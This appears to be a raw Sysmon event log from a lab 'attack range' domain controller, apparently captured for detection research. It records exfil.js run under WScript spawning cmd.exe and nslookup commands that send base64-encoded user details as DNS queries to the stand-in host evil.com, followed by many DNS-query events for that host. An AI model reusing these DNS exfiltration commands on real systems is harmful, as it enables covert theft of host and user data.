354300x8000000000000000212464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.494{00000000-0000-0000-0000-000000000000}3452<unknown process>-udpfalsefalse127.0.0.1-50967-false127.0.0.1-53domain 354300x8000000000000000212463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.493{00000000-0000-0000-0000-000000000000}3452<unknown process>-udptruefalse127.0.0.1-50967-false127.0.0.1-53domain 10341000x8000000000000000212462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.954{2E1864BB-18F5-629A-1145-000000005F02}47764192C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-1245-000000005F02}6652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.954{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.954{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.954{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.954{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.954{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-1245-000000005F02}6652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.938{2E1864BB-18F5-629A-1045-000000005F02}13845628C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-1245-000000005F02}6652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.953{2E1864BB-18F5-629A-1245-000000005F02}6652C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-1045-000000005F02}1384C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkjsdn.tmp 2>&1 10341000x8000000000000000212454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.924{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-1145-000000005F02}4776C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.924{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-1145-000000005F02}4776C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.924{2E1864BB-18F5-629A-1145-000000005F02}47764192C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-1045-000000005F02}1384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.924{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-1145-000000005F02}4776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.908{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.908{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.908{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.908{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-1045-000000005F02}1384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.908{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.908{2E1864BB-18E0-629A-6742-000000005F02}39766228C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-1045-000000005F02}1384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.910{2E1864BB-18F5-629A-1045-000000005F02}1384C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkjsdn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.892{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltmqmqn.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000212442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.928{00000000-0000-0000-0000-000000000000}3236evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.865{00000000-0000-0000-0000-000000000000}1368evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.801{00000000-0000-0000-0000-000000000000}488evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.731{00000000-0000-0000-0000-000000000000}8104evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.631{00000000-0000-0000-0000-000000000000}3864evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.554{00000000-0000-0000-0000-000000000000}5592evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.476{00000000-0000-0000-0000-000000000000}5036evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.401{00000000-0000-0000-0000-000000000000}5792evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.340{00000000-0000-0000-0000-000000000000}3192evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.266{00000000-0000-0000-0000-000000000000}8152evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.185{00000000-0000-0000-0000-000000000000}6512evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.112{00000000-0000-0000-0000-000000000000}1188evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000212430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.869{2E1864BB-18F5-629A-0E45-000000005F02}81126396C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-0F45-000000005F02}3300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.853{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.853{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.853{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.853{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.853{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0F45-000000005F02}3300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.853{2E1864BB-18F5-629A-0D45-000000005F02}4052388C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-0F45-000000005F02}3300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.867{2E1864BB-18F5-629A-0F45-000000005F02}3300C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-0D45-000000005F02}4052C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > 